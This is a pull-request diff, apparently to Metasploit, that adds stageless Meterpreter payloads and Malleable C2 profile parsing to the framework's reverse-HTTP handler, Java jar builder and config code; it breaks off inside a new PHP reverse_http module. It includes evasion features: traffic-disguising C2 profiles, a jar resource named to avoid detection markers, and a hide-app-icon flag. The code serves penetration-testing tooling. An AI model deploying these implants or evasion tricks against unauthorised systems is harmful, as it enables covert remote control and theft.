### PR TITLE
Stageless PHP/Python/Java/Windows/Mettle with Malleable C2 profile support

### DIFF
--- a/lib/msf/base/sessions/mettle_config.rb
+++ b/lib/msf/base/sessions/mettle_config.rb
@@ -123,11 +123,23 @@ module Msf
           expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
           uuid:              opts[:uuid],
           transports:        opts[:transport_config],
+          extensions:        opts[:extensions] || [],
+          ext_format:        'bin',
+          mettle_platform:   opts[:mettle_platform],
           stageless:         opts[:stageless] == true,
         }.merge(meterpreter_logging_config(opts))
 
         config = Rex::Payloads::Meterpreter::Config.new(config_opts)
         opts[:config_block] = config.to_b
+
+        # Mettle reserves a fixed 8 KB slot in the binary for the config
+        # block. Catch the overflow here with a useful message instead of
+        # letting the gem's `to_binary` raise a generic "config block too
+        # large" — baked-in EXTENSIONS= is the usual culprit.
+        if opts[:config_block].length > MetasploitPayloads::Mettle::CONFIG_BLOCK_MAX
+          raise ArgumentError, "Mettle config block (#{opts[:config_block].length} bytes) exceeds the #{MetasploitPayloads::Mettle::CONFIG_BLOCK_MAX}-byte embedded slot. " \
+            "Drop EXTENSIONS= and `load <ext>` once the session is up."
+        end
 
         # Keep the legacy CLI config for backward compatibility during
         # transition. Skipped for staged payloads, which have no transport.

--- a/lib/msf/base/sessions/mettle_config.rb
+++ b/lib/msf/base/sessions/mettle_config.rb
@@ -97,15 +97,22 @@ module Msf
         opts[:uuid] ||= generate_payload_uuid
 
         unless opts[:transport_config]
-          case opts[:scheme]
-          when 'http'
-            opts[:transport_config] = [transport_config_reverse_http(opts)]
-          when 'https'
-            opts[:transport_config] = [transport_config_reverse_https(opts)]
-          when 'tcp'
-            opts[:transport_config] = [transport_config_reverse_tcp(opts)]
+          if opts[:stageless] == true
+            case opts[:scheme]
+            when 'http'
+              opts[:transport_config] = [transport_config_reverse_http(opts)]
+            when 'https'
+              opts[:transport_config] = [transport_config_reverse_https(opts)]
+            when 'tcp'
+              opts[:transport_config] = [transport_config_reverse_tcp(opts)]
+            else
+              raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
+            end
           else
-            raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
+            # Staged payloads inherit the stager's socket (fd transport);
+            # the stage must not synthesise its own C2 transport. Use an
+            # explicit empty array ([] is truthy, so the build is skipped).
+            opts[:transport_config] = []
           end
         end
 
@@ -122,14 +129,16 @@ module Msf
         config = Rex::Payloads::Meterpreter::Config.new(config_opts)
         opts[:config_block] = config.to_b
 
-        # Keep the legacy CLI config for backward compatibility during transition
-        case opts[:scheme]
-        when 'http'
-          opts[:uri] = generate_http_uri(opts[:transport_config].first)
-        when 'https'
-          opts[:uri] = generate_http_uri(opts[:transport_config].first)
-        when 'tcp'
-          opts[:uri] = generate_tcp_uri(opts[:transport_config].first)
+        # Keep the legacy CLI config for backward compatibility during
+        # transition. Skipped for staged payloads, which have no transport.
+        transport = opts[:transport_config].first
+        if transport
+          case opts[:scheme]
+          when 'http', 'https'
+            opts[:uri] = generate_http_uri(transport)
+          when 'tcp'
+            opts[:uri] = generate_tcp_uri(transport)
+          end
         end
 
         opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip

--- a/lib/msf/base/sessions/mettle_config.rb
+++ b/lib/msf/base/sessions/mettle_config.rb
@@ -96,15 +96,40 @@ module Msf
 
         opts[:uuid] ||= generate_payload_uuid
 
+        unless opts[:transport_config]
+          case opts[:scheme]
+          when 'http'
+            opts[:transport_config] = [transport_config_reverse_http(opts)]
+          when 'https'
+            opts[:transport_config] = [transport_config_reverse_https(opts)]
+          when 'tcp'
+            opts[:transport_config] = [transport_config_reverse_tcp(opts)]
+          else
+            raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
+          end
+        end
+
+        # Generate the TLV config block
+        config_opts = {
+          ascii_str:         true,
+          null_session_guid: opts[:stageless] == true,
+          expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+          uuid:              opts[:uuid],
+          transports:        opts[:transport_config],
+          stageless:         opts[:stageless] == true,
+        }.merge(meterpreter_logging_config(opts))
+
+        config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+        opts[:config_block] = config.to_b
+
+        # Keep the legacy CLI config for backward compatibility during transition
         case opts[:scheme]
         when 'http'
-          opts[:uri] = generate_http_uri(transport_config_reverse_http(opts))
+          opts[:uri] = generate_http_uri(opts[:transport_config].first)
         when 'https'
-          opts[:uri] = generate_http_uri(transport_config_reverse_https(opts))
+          opts[:uri] = generate_http_uri(opts[:transport_config].first)
         when 'tcp'
-          opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts))
-        else
-          raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
+          opts[:uri] = generate_tcp_uri(opts[:transport_config].first)
         end
 
         opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
@@ -114,7 +139,7 @@ module Msf
         end
         opts[:session_guid] = Base64.encode64(guid).strip
 
-        opts.slice(:uuid, :session_guid, :uri, :debug, :log_file, :name, :background)
+        opts.slice(:uuid, :session_guid, :uri, :debug, :log_file, :name, :background, :config_block)
       end
 
       # Stage encoding is not safe for Mettle (doesn't apply to stageless)

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -386,6 +386,10 @@ protected
       conn_id = req.conn_id
     end
 
+    elog("MC2DBG on_request resource=#{req.relative_resource.inspect} " \
+         "conn_id=#{req.conn_id.inspect} " \
+         "info=#{info.nil? ? 'nil' : { sum: info[:sum], mode: info[:mode], uuid: !info[:uuid].nil? }.inspect}")
+
     if uuid
       # Configure the UUID architecture and payload if necessary
       uuid.arch      ||= self.arch

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -391,7 +391,7 @@ protected
       uuid.arch      ||= self.arch
       uuid.platform  ||= self.platform
 
-      request_summary = "URI '#{luri}' with UA '#{req.headers['User-Agent']}'"
+      request_summary = "URI '#{req.resource}' with UA '#{req.headers['User-Agent']}'"
 
       if info[:mode] && info[:mode] != :connect
         conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
@@ -435,7 +435,7 @@ protected
     # Process the requested resource.
     case info[:mode]
       when :init_connect
-        print_status("Redirecting stageless connection from #{request_summary} to #{conn_id}")
+        print_status("Redirecting stageless: #{request_summary} -> UUID #{conn_id.gsub(/\//, '')}")
 
         # Handle the case where stageless payloads call in on the same URI when they
         # first connect. From there, we tell them to callback on a connect URI that

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -280,24 +280,69 @@ module ReverseHttp
     end
   end
 
+  # Extract the connection id (the checksum-tuned base64url UUID string
+  # produced by `generate_uri_uuid`) from an incoming request, so that
+  # `process_uri_resource` can map it to a session. The id can arrive in
+  # three places depending on the C2 profile placement directive:
+  #
+  #   * query parameter   (profile: `parameter "name";`)
+  #   * request header    (profile: `header    "name";`)
+  #   * trailing path seg (default — no placement directive)
+  #
+  # For the path case, the URI looks like `<base>/<id>`, where `<base>`
+  # is the profile's per-verb `set uri` if defined, otherwise `LURI`
+  # (each is registered as a separate mount point in `all_uris`).
+  # Taking the last `/`-separated segment skips the base regardless of
+  # which one was used. Profile authors should not put `/` in
+  # prepend/append directives — that would split the id across segments
+  # and defeat this scheme.
+  #
+  # If the profile applied `prepend` / `append` / `base64` / `base64url`
+  # to the id on the payload side, undo those transforms here before
+  # handing the result to `process_uri_resource`.
   def find_resource_id(cli, request)
     if request.method == 'POST'
-      directive = self.c2_profile&.http_post&.client&.id&.parameter
-      cid = request.qstring[directive[0].args[0]] if directive && directive.length > 0
-      unless cid
-        directive = self.c2_profile&.http_post&.client&.id&.header
-        cid = request.headers[directive[0].args[0]] if directive && directive.length > 0
-      end
+      placement = self.c2_profile&.http_post&.client&.id
     else
-      directive = self.c2_profile&.http_get&.client&.metadata&.parameter
+      placement = self.c2_profile&.http_get&.client&.metadata
+    end
+
+    cid = nil
+    if placement
+      directive = placement.parameter
       cid = request.qstring[directive[0].args[0]] if directive && directive.length > 0
       unless cid
-        directive = self.c2_profile&.http_get&.client&.metadata&.header
+        directive = placement.header
         cid = request.headers[directive[0].args[0]] if directive && directive.length > 0
       end
     end
 
-    request.conn_id = cid || request.resource.split('?')[0].split('/').compact.last
+    cid ||= request.resource.split('?')[0].split('/').compact.last
+    cid = unwrap_profile_uuid(cid, placement) if cid && placement
+
+    request.conn_id = cid
+  end
+
+  # Reverse the prepend/append + base64 transforms the profile applied
+  # to the id on the payload side. If a declared wrapper is missing from
+  # the candidate, leave the candidate alone — this is not a payload
+  # request, and `process_uri_resource` will return nil for it.
+  def unwrap_profile_uuid(candidate, placement)
+    prefix = placement.prepend.map{|d| d.args[0]}.join('')
+    suffix = placement.append.map{|d| d.args[0]}.join('')
+
+    return candidate unless prefix.empty? || candidate.start_with?(prefix)
+    return candidate unless suffix.empty? || candidate.end_with?(suffix)
+
+    candidate = candidate[prefix.length..] unless prefix.empty?
+    candidate = candidate[0...-suffix.length] unless suffix.empty?
+
+    if placement.has_directive('base64')
+      candidate = Rex::Text.decode_base64(candidate)
+    elsif placement.has_directive('base64url')
+      candidate = Rex::Text.decode_base64url(candidate)
+    end
+    candidate
   end
 
   def add_response_headers(req, resp)

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -386,16 +386,12 @@ protected
       conn_id = req.conn_id
     end
 
-    elog("MC2DBG on_request resource=#{req.relative_resource.inspect} " \
-         "conn_id=#{req.conn_id.inspect} " \
-         "info=#{info.nil? ? 'nil' : { sum: info[:sum], mode: info[:mode], uuid: !info[:uuid].nil? }.inspect}")
-
     if uuid
       # Configure the UUID architecture and payload if necessary
       uuid.arch      ||= self.arch
       uuid.platform  ||= self.platform
 
-      request_summary = "#{luri} with UA '#{req.headers['User-Agent']}'"
+      request_summary = "URI '#{luri}' with UA '#{req.headers['User-Agent']}'"
 
       if info[:mode] && info[:mode] != :connect
         conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -355,6 +355,21 @@ module ReverseHttp
     end
   end
 
+  # Return the live meterpreter session whose passive dispatcher is
+  # registered for this bare conn_id, or nil if none matches. Used so
+  # MC2 traffic — which Rex routes to on_request because the profile
+  # URI prefix outranks the session's /<conn_id> mount — can still be
+  # delivered to the right session instead of triggering a fresh
+  # "orphaned attach" on every poll.
+  def session_for_conn_id(bare_conn_id)
+    return nil if framework.nil? || bare_conn_id.nil? || bare_conn_id.empty?
+    framework.sessions.each_value do |s|
+      next unless s.respond_to?(:connection_uuid)
+      return s if s.connection_uuid == bare_conn_id
+    end
+    nil
+  end
+
   #
   # Removes the / handler, possibly stopping the service if no sessions are
   # active on sub-urls.
@@ -496,6 +511,17 @@ protected
         # TODO: at some point we may normalise these three cases into just :init
 
         if info[:mode] == :connect
+          # If a session already exists for this conn_id, hand the
+          # request to its passive dispatcher. Without this, MC2
+          # profiles loop forever on "orphaned attach" because the
+          # profile URI prefix outranks the session's /<conn_id>
+          # mount in Rex's VirtualDirectory routing.
+          existing = session_for_conn_id(req.conn_id)
+          if existing
+            existing.send(:on_passive_request, cli, req)
+            self.pending_connections -= 1
+            return
+          end
           print_status("Attaching orphaned/stageless session...")
         else
           begin

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -447,7 +447,7 @@ protected
         resp.body = pkt.to_r
         resp.body = self.c2_profile.wrap_outbound_get(resp.body) if self.c2_profile
 
-      when :init_python, :init_native, :init_java, :connect
+      when :init_python, :init_native, :init_java, :init_php, :connect
         # TODO: at some point we may normalise these three cases into just :init
 
         if info[:mode] == :connect

--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -46,23 +46,26 @@ module Msf::Payload::Android
     opts[:uuid] ||= generate_payload_uuid
     ds = opts[:datastore] || datastore
 
+    # Session flags consumed by the Android meterpreter via TLV_TYPE_SESSION_FLAGS.
+    # Bit values must match Config.FLAG_* in
+    # java/meterpreter/shared/src/main/java/com/metasploit/stage/Config.java.
+    flags = 0
+    flags |= 1 if opts[:stageless]
+    flags |= 2 if ds['AndroidMeterpreterDebug']
+    flags |= 4 if ds['AndroidWakelock']
+    flags |= 8 if ds['AndroidHideAppIcon']
+
     config_opts = {
       ascii_str:  true,
       arch:       opts[:uuid].arch,
       expiration: ds['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: opts[:transport_config] || [transport_config(opts)],
-      stageless:  opts[:stageless] == true
+      stageless:  opts[:stageless] == true,
+      flags:      flags
     }
 
-    config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
-    flags = 0
-    flags |= 1 if opts[:stageless]
-    flags |= 2 if ds['AndroidMeterpreterDebug']
-    flags |= 4 if ds['AndroidWakelock']
-    flags |= 8 if ds['AndroidHideAppIcon']
-    config[0] = flags.chr
-    config
+    Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
   end
 
   def sign_jar(jar)

--- a/lib/msf/core/payload/java/meterpreter_loader.rb
+++ b/lib/msf/core/payload/java/meterpreter_loader.rb
@@ -128,6 +128,8 @@ module Payload::Java::MeterpreterLoader
       expiration: ds['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: opts[:transport_config] || [transport_config(opts)],
+      extensions: opts[:extensions] || [],
+      ext_format: 'jar',
       stageless:  opts[:stageless] == true
     }
 

--- a/lib/msf/core/payload/java/meterpreter_loader.rb
+++ b/lib/msf/core/payload/java/meterpreter_loader.rb
@@ -1,5 +1,7 @@
 # -*- coding: binary -*-
 
+require 'rex/zip'
+require 'zip'
 
 module Msf
 
@@ -14,6 +16,11 @@ module Payload::Java::MeterpreterLoader
   include Msf::Payload::Java
   include Msf::Payload::UUID::Options
   include Msf::Sessions::MeterpreterOptions::Java
+
+  # Resource path the stageless StagelessMain bootstrap reads. Deliberately
+  # innocuous — no meterpreter/metasploit markers in the name.
+  STAGELESS_CONFIG_RESOURCE = 'META-INF/data'.freeze
+  STAGELESS_MAIN_CLASS = 'com.metasploit.meterpreter.StagelessMain'.freeze
 
   def initialize(info = {})
     super(update_info(info,
@@ -35,9 +42,15 @@ module Payload::Java::MeterpreterLoader
   # Override the Payload::Java version so we can load a prebuilt jar to be
   # used as the final stage; calls super to get the intermediate stager.
   #
+  # When opts[:stageless] is set, returns a self-contained jar with the
+  # TLV config embedded as a resource and Main-Class pinned to
+  # StagelessMain — ready to run under `java -jar`.
+  #
   def stage_meterpreter(opts={})
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
     config = generate_config(opts)
+
+    return build_stageless_jar(met, config) if opts[:stageless]
 
     # All of the dependencies to create a jar loader, followed by the length
     # of the jar and the jar itself, then the config
@@ -54,6 +67,24 @@ module Payload::Java::MeterpreterLoader
 
     # Pack all the magic together
     (blocks + [block_count]).pack('A*' * blocks.length + 'N')
+  end
+
+  # Build a self-contained stageless jar: take the prebuilt meterpreter.jar,
+  # rewrite its manifest to point at StagelessMain, and embed the encoded
+  # config as a jar resource that StagelessMain reads at startup.
+  def build_stageless_jar(src_jar, config_bytes)
+    jar = Rex::Zip::Jar.new
+    ::Zip::File.open_buffer(::StringIO.new(src_jar)) do |zip|
+      zip.each do |entry|
+        next if entry.directory?
+        next if entry.name == 'META-INF/MANIFEST.MF'
+        next if entry.name == STAGELESS_CONFIG_RESOURCE
+        jar.add_file(entry.name, entry.get_input_stream.read)
+      end
+    end
+    jar.add_file(STAGELESS_CONFIG_RESOURCE, config_bytes)
+    jar.build_manifest(main_class: STAGELESS_MAIN_CLASS)
+    jar.pack
   end
 
   def generate_config(opts={})

--- a/lib/msf/core/payload/java/meterpreter_loader.rb
+++ b/lib/msf/core/payload/java/meterpreter_loader.rb
@@ -50,7 +50,7 @@ module Payload::Java::MeterpreterLoader
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
     config = generate_config(opts)
 
-    return build_stageless_jar(met, config) if opts[:stageless]
+    return build_stageless_jar(met, config).pack if opts[:stageless]
 
     # All of the dependencies to create a jar loader, followed by the length
     # of the jar and the jar itself, then the config
@@ -71,7 +71,17 @@ module Payload::Java::MeterpreterLoader
 
   # Build a self-contained stageless jar: take the prebuilt meterpreter.jar,
   # rewrite its manifest to point at StagelessMain, and embed the encoded
-  # config as a jar resource that StagelessMain reads at startup.
+  # config as a jar resource that StagelessMain reads at startup. Returns
+  # the Rex::Zip::Jar so callers can either .pack it (legacy stage path)
+  # or hand it to msfvenom's encoded_jar/generate_jar pipeline.
+  # Extra classes the stageless jar needs beyond the shaded meterpreter jar.
+  # JarFileClassLoader lives in the javapayload artifact (which the shade
+  # plugin deliberately excludes), but `Meterpreter#loadExtension` uses it
+  # to load extension jars at runtime.
+  STAGELESS_EXTRA_CLASSES = [
+    %w[com metasploit meterpreter JarFileClassLoader.class],
+  ].freeze
+
   def build_stageless_jar(src_jar, config_bytes)
     jar = Rex::Zip::Jar.new
     ::Zip::File.open_buffer(::StringIO.new(src_jar)) do |zip|
@@ -82,9 +92,29 @@ module Payload::Java::MeterpreterLoader
         jar.add_file(entry.name, entry.get_input_stream.read)
       end
     end
+    STAGELESS_EXTRA_CLASSES.each do |parts|
+      jar.add_file(parts.join('/'), ::MetasploitPayloads.read('java', *parts))
+    end
     jar.add_file(STAGELESS_CONFIG_RESOURCE, config_bytes)
     jar.build_manifest(main_class: STAGELESS_MAIN_CLASS)
-    jar.pack
+    jar
+  end
+
+  # `Msf::Simple::Payload.generate_simple` reaches the jar bytes via
+  # `encoded_jar` -> `pinst.generate_jar`. The Java meterpreter modules
+  # that include this mixin are all `Msf::Payload::Single` (stageless),
+  # so build the self-contained jar instead of falling back to
+  # `Msf::Payload::Java#generate_jar`, which would emit the staged
+  # `metasploit.Payload` loader jar.
+  # When the calling module flags `opts[:stageless]`, build the
+  # self-contained jar via `build_stageless_jar`. Otherwise fall back to
+  # `Msf::Payload::Java#generate_jar`, which emits the staged
+  # `metasploit.Payload` loader jar.
+  def generate_jar(opts={})
+    return super unless opts[:stageless]
+
+    src_jar = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
+    build_stageless_jar(src_jar, generate_config(opts))
   end
 
   def generate_config(opts={})

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -248,9 +248,10 @@ module Msf::Payload::MalleableC2
       http_get.get_section('client') {|client|
         self.add_http_tlv(get_uri, client, get_tlv)
         add_skip_tlvs(get_tlv, self.http_get&.server&.output)
+        add_inbound_encoding_tlv(get_tlv, self.http_get&.server&.output)
 
         client.get_section('metadata') {|meta|
-          add_encoding_tlv(get_tlv, meta)
+          add_outbound_encoding_tlv(get_tlv, meta)
           add_uuid_tlvs(get_tlv, meta)
         }
       }
@@ -263,9 +264,10 @@ module Msf::Payload::MalleableC2
       http_post.get_section('client') {|client|
         self.add_http_tlv(post_uri, client, post_tlv)
         add_skip_tlvs(post_tlv, self.http_post&.server&.output)
+        add_inbound_encoding_tlv(post_tlv, self.http_post&.server&.output)
 
         client.get_section('output') {|client_output|
-          add_encoding_tlv(post_tlv, client_output)
+          add_outbound_encoding_tlv(post_tlv, client_output)
 
           prepend_data = client_output.get_directive('prepend').map{|d|d.args[0]}.join("")
           post_tlv.add_tlv(MET::TLV_TYPE_C2_PREFIX, prepend_data) unless prepend_data.empty?
@@ -290,11 +292,23 @@ module Msf::Payload::MalleableC2
       group_tlv.add_tlv(MET::TLV_TYPE_C2_SUFFIX_SKIP, suffix_len) unless suffix_len == 0
     end
 
-    def add_encoding_tlv(group_tlv, section)
-      enc_flags = MET::C2_ENCODING_NONE
-      enc_flags = MET::C2_ENCODING_B64URL if section.has_directive('base64url')
-      enc_flags = MET::C2_ENCODING_B64 if section.has_directive('base64')
-      group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC, enc_flags) if enc_flags != MET::C2_ENCODING_NONE
+    def encoding_flags_for(section)
+      return MET::C2_ENCODING_NONE if section.nil?
+      return MET::C2_ENCODING_B64 if section.has_directive('base64')
+      return MET::C2_ENCODING_B64URL if section.has_directive('base64url')
+      MET::C2_ENCODING_NONE
+    end
+
+    # Client->server body/metadata encoding (request)
+    def add_outbound_encoding_tlv(group_tlv, section)
+      enc = encoding_flags_for(section)
+      group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC_OUTBOUND, enc) if enc != MET::C2_ENCODING_NONE
+    end
+
+    # Server->client body encoding (response)
+    def add_inbound_encoding_tlv(group_tlv, section)
+      enc = encoding_flags_for(section)
+      group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC_INBOUND, enc) if enc != MET::C2_ENCODING_NONE
     end
 
     def add_uuid_tlvs(group_tlv, section)

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -114,8 +114,10 @@ module Msf::Payload::MalleableC2
         if scanner.scan(/\s+/)
           # blank line
           next
-        elsif scanner.scan(/^\s*#.*$/)
-          # comment
+        elsif scanner.scan(/#[^\n]*/)
+          # comment — anchorless so it matches indented comments too
+          # (the prior `\s+` rule has already eaten any leading
+          # whitespace by the time we get here)
           next
         elsif scanner.scan(/\"(\\.|[^"])*\"/)
           @tokens << Token.new(:string, scanner.matched[1..-2])

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -251,7 +251,7 @@ module Msf::Payload::MalleableC2
         add_inbound_encoding_tlv(get_tlv, self.http_get&.server&.output)
 
         client.get_section('metadata') {|meta|
-          add_outbound_encoding_tlv(get_tlv, meta)
+          add_uuid_transform_tlvs(get_tlv, meta)
           add_uuid_tlvs(get_tlv, meta)
         }
       }
@@ -276,6 +276,7 @@ module Msf::Payload::MalleableC2
         }
 
         client.get_section('id') {|client_id|
+          add_uuid_transform_tlvs(post_tlv, client_id)
           add_uuid_tlvs(post_tlv, client_id)
         }
       }
@@ -309,6 +310,20 @@ module Msf::Payload::MalleableC2
     def add_inbound_encoding_tlv(group_tlv, section)
       enc = encoding_flags_for(section)
       group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC_INBOUND, enc) if enc != MET::C2_ENCODING_NONE
+    end
+
+    # UUID placement encoding + prepend/append wrappers. Section is
+    # `client.metadata` (GET) or `client.id` (POST).
+    def add_uuid_transform_tlvs(group_tlv, section)
+      return if section.nil?
+
+      enc = encoding_flags_for(section)
+      group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC_UUID, enc) if enc != MET::C2_ENCODING_NONE
+
+      prepend_data = section.get_directive('prepend').map{|d|d.args[0]}.join("")
+      group_tlv.add_tlv(MET::TLV_TYPE_C2_UUID_PREFIX, prepend_data) unless prepend_data.empty?
+      append_data = section.get_directive('append').map{|d|d.args[0]}.join("")
+      group_tlv.add_tlv(MET::TLV_TYPE_C2_UUID_SUFFIX, append_data) unless append_data.empty?
     end
 
     def add_uuid_tlvs(group_tlv, section)

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -268,11 +268,7 @@ module Msf::Payload::MalleableC2
 
         client.get_section('output') {|client_output|
           add_outbound_encoding_tlv(post_tlv, client_output)
-
-          prepend_data = client_output.get_directive('prepend').map{|d|d.args[0]}.join("")
-          post_tlv.add_tlv(MET::TLV_TYPE_C2_PREFIX, prepend_data) unless prepend_data.empty?
-          append_data = client_output.get_directive('append').map{|d|d.args[0]}.join("")
-          post_tlv.add_tlv(MET::TLV_TYPE_C2_SUFFIX, append_data) unless append_data.empty?
+          add_prepend_append_tlvs(post_tlv, client_output, MET::TLV_TYPE_C2_PREFIX, MET::TLV_TYPE_C2_SUFFIX)
         }
 
         client.get_section('id') {|client_id|
@@ -319,11 +315,16 @@ module Msf::Payload::MalleableC2
 
       enc = encoding_flags_for(section)
       group_tlv.add_tlv(MET::TLV_TYPE_C2_ENC_UUID, enc) if enc != MET::C2_ENCODING_NONE
+      add_prepend_append_tlvs(group_tlv, section, MET::TLV_TYPE_C2_UUID_PREFIX, MET::TLV_TYPE_C2_UUID_SUFFIX)
+    end
 
+    # Concatenate every `prepend`/`append` directive in `section` and emit
+    # them as the given prefix/suffix TLVs (skipping empty strings).
+    def add_prepend_append_tlvs(group_tlv, section, prefix_type, suffix_type)
       prepend_data = section.get_directive('prepend').map{|d|d.args[0]}.join("")
-      group_tlv.add_tlv(MET::TLV_TYPE_C2_UUID_PREFIX, prepend_data) unless prepend_data.empty?
+      group_tlv.add_tlv(prefix_type, prepend_data) unless prepend_data.empty?
       append_data = section.get_directive('append').map{|d|d.args[0]}.join("")
-      group_tlv.add_tlv(MET::TLV_TYPE_C2_UUID_SUFFIX, append_data) unless append_data.empty?
+      group_tlv.add_tlv(suffix_type, append_data) unless append_data.empty?
     end
 
     def add_uuid_tlvs(group_tlv, section)

--- a/lib/msf/core/payload/malleable_c2.rb
+++ b/lib/msf/core/payload/malleable_c2.rb
@@ -178,7 +178,12 @@ module Msf::Payload::MalleableC2
         post_uri = http_post.get_set('uri')
       }
 
-      [base_uri, get_uri, post_uri].compact
+      # A `set uri` value may list several space-separated candidate URIs
+      # (Cobalt Strike picks one at random per request). Split them out so
+      # the handler registers a mount for each candidate, otherwise the
+      # literal "uri-a uri-b" string is registered as a single unmatchable
+      # resource.
+      [base_uri, get_uri, post_uri].compact.flat_map {|u| u.split(/\s+/) }.reject(&:empty?).uniq
     end
 
     def wrap_outbound_get(raw_bytes)
@@ -348,14 +353,27 @@ module Msf::Payload::MalleableC2
     end
 
     def add_uri(base_uri, section, group_tlv)
-      uri = (base_uri || "").dup
       query_string = section.get_directive('parameter').map {|dir| "#{dir.args[0]}=#{URI.encode_uri_component(dir.args[1])}" }.join("&")
-      unless query_string.empty?
-        uri << "?"
-        uri << query_string
+
+      # `set uri` may carry a space-separated list of candidate URIs. Emit
+      # one TLV_TYPE_C2_URI per candidate so the client can pick one at
+      # random; an empty/absent uri collapses to a single empty candidate
+      # to preserve the prior (query-string-only) behaviour.
+      candidates = (base_uri || "").split(/\s+/).reject(&:empty?)
+      candidates = [""] if candidates.empty?
+
+      emitted = []
+      candidates.each do |candidate|
+        uri = candidate.dup
+        unless query_string.empty?
+          uri << "?"
+          uri << query_string
+        end
+        next if uri.empty?
+        group_tlv.add_tlv(MET::TLV_TYPE_C2_URI, uri)
+        emitted << uri
       end
-      group_tlv.add_tlv(MET::TLV_TYPE_C2_URI, uri) unless uri.empty?
-      uri
+      emitted
     end
   end
 
@@ -430,8 +448,16 @@ module Msf::Payload::MalleableC2
       while current_token
         if match_keyword('set')
           profile.sets << parse_set
-        elsif current_token.type == :keyword && @lexer.is_block_keyword?(current_token.value)
+        elsif block_ahead?
+          # Any `name { ... }` is a block. We keep the ones we understand
+          # (http-get/http-post/etc.) and harmlessly retain the rest —
+          # unsupported CS blocks like dns-beacon/process-inject/post-ex
+          # are parsed for structure and simply ignored by to_tlv.
           profile.sections << parse_section
+        elsif name_token?
+          # A stray top-level directive we don't model. Consume it (up to
+          # its `;`) and move on rather than failing the whole profile.
+          parse_directive
         else
           raise "Unexpected token at top level: #{current_token.type}=#{current_token.value}"
         end
@@ -450,19 +476,17 @@ module Msf::Payload::MalleableC2
     end
 
     def parse_section
-      name = expect(:keyword).value
+      name = expect_name.value
       expect_symbol('{')
       section = ParsedSection.new(name)
 
       while !match_symbol('}') && current_token
         if match_keyword('set')
           section.entries << parse_set
-        elsif current_token.type == :keyword
-          if @lexer.is_block_keyword?(current_token.value)
-            section.sections << parse_section
-          else
-            section.entries << parse_directive
-          end
+        elsif block_ahead?
+          section.sections << parse_section
+        elsif name_token?
+          section.entries << parse_directive
         else
           raise "Unexpected content in block #{name}: #{current_token.value}"
         end
@@ -473,7 +497,7 @@ module Msf::Payload::MalleableC2
     end
 
     def parse_directive
-      type = expect(:keyword).value
+      type = expect_name.value
       args = []
       while current_token && !match_symbol(';')
         if [:string, :identifier, :keyword].include?(current_token.type)
@@ -491,9 +515,33 @@ module Msf::Payload::MalleableC2
       @lexer.tokens[@index]
     end
 
+    def peek_token(offset = 1)
+      @lexer.tokens[@index + offset]
+    end
+
     def next_token
       @index += 1
       current_token
+    end
+
+    # A bare name that can head a block, directive or set key. Block
+    # detection no longer depends on a keyword whitelist, so profiles can
+    # carry CS blocks we don't model (dns-beacon, process-inject, ...)
+    # without breaking the parse.
+    def name_token?
+      t = current_token
+      !t.nil? && (t.type == :identifier || t.type == :keyword)
+    end
+
+    # True when the current token names a block, i.e. it's followed by `{`.
+    def block_ahead?
+      return false unless name_token?
+      nt = peek_token(1)
+      !nt.nil? && nt.type == :symbol && nt.value == '{'
+    end
+
+    def expect_name
+      expect([:identifier, :keyword])
     end
 
     def expect(types)

--- a/lib/msf/core/payload/php/reverse_http.rb
+++ b/lib/msf/core/payload/php/reverse_http.rb
@@ -1,0 +1,128 @@
+# -*- coding: binary -*-
+
+module Msf
+
+module Payload::Php::ReverseHttp
+
+  include Msf::Payload::UUID::Options
+
+  def initialize(info = {})
+    super(info)
+    register_advanced_options(
+      Msf::Opt::http_header_options +
+      Msf::Opt::http_proxy_options
+    )
+    deregister_options('HttpProxyType')
+  end
+
+  #
+  # Generate the first stage
+  #
+  def generate(opts = {})
+    opts[:scheme] = 'http' if opts[:scheme].nil?
+    generate_reverse_http(opts)
+  end
+
+  #
+  # Return the callback URL
+  #
+  def generate_callback_url(opts)
+    if Rex::Socket.is_ipv6?(opts[:host])
+      target_url = "#{opts[:scheme]}://[#{opts[:host]}]"
+    else
+      target_url = "#{opts[:scheme]}://#{opts[:host]}"
+    end
+
